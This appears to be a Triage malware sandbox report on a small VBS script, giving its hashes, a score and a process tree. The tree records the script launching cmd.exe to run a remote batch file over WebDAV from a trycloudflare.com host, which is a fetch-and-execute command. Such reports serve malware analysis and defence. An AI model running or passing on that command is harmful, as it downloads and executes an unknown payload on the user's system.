df4359d7ac38dd88523297635c566fc010aae277576d36d46995fcdd170ef8a6 | Triage

Analysis

max time kernel
15s
max time network
17s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
20/11/2024, 03:37

Sharing

Report Analysis Logs

General

Target

df4359d7ac38dd88523297635c566fc010aae277576d36d46995fcdd170ef8a6.vbs
Size

156B
MD5

02ffc2ad630bb15b3749925afd70c311
SHA1

bb684ab92daa33927c7f90d46dc17de87829a488
SHA256

df4359d7ac38dd88523297635c566fc010aae277576d36d46995fcdd170ef8a6
SHA512

239dbfead360fcf4d611c760645085e5dbde1ef33f4c2b439014131ae10c75f0de22504cb1dbd9e60090d26eff205b68552047da46d405814a0bb82dbc7410e5

Score

1^/10

Malware Config

Signatures

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2308 wrote to memory of 2904	2308	WScript.exe	30
PID 2308 wrote to memory of 2904	2308	WScript.exe	30
PID 2308 wrote to memory of 2904	2308	WScript.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\df4359d7ac38dd88523297635c566fc010aae277576d36d46995fcdd170ef8a6.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2308
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c \\ooo-marshall-parties-cartoons.trycloudflare.com@SSL\DavWWWRoot\new.bat
  2⤵
  PID:2904

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads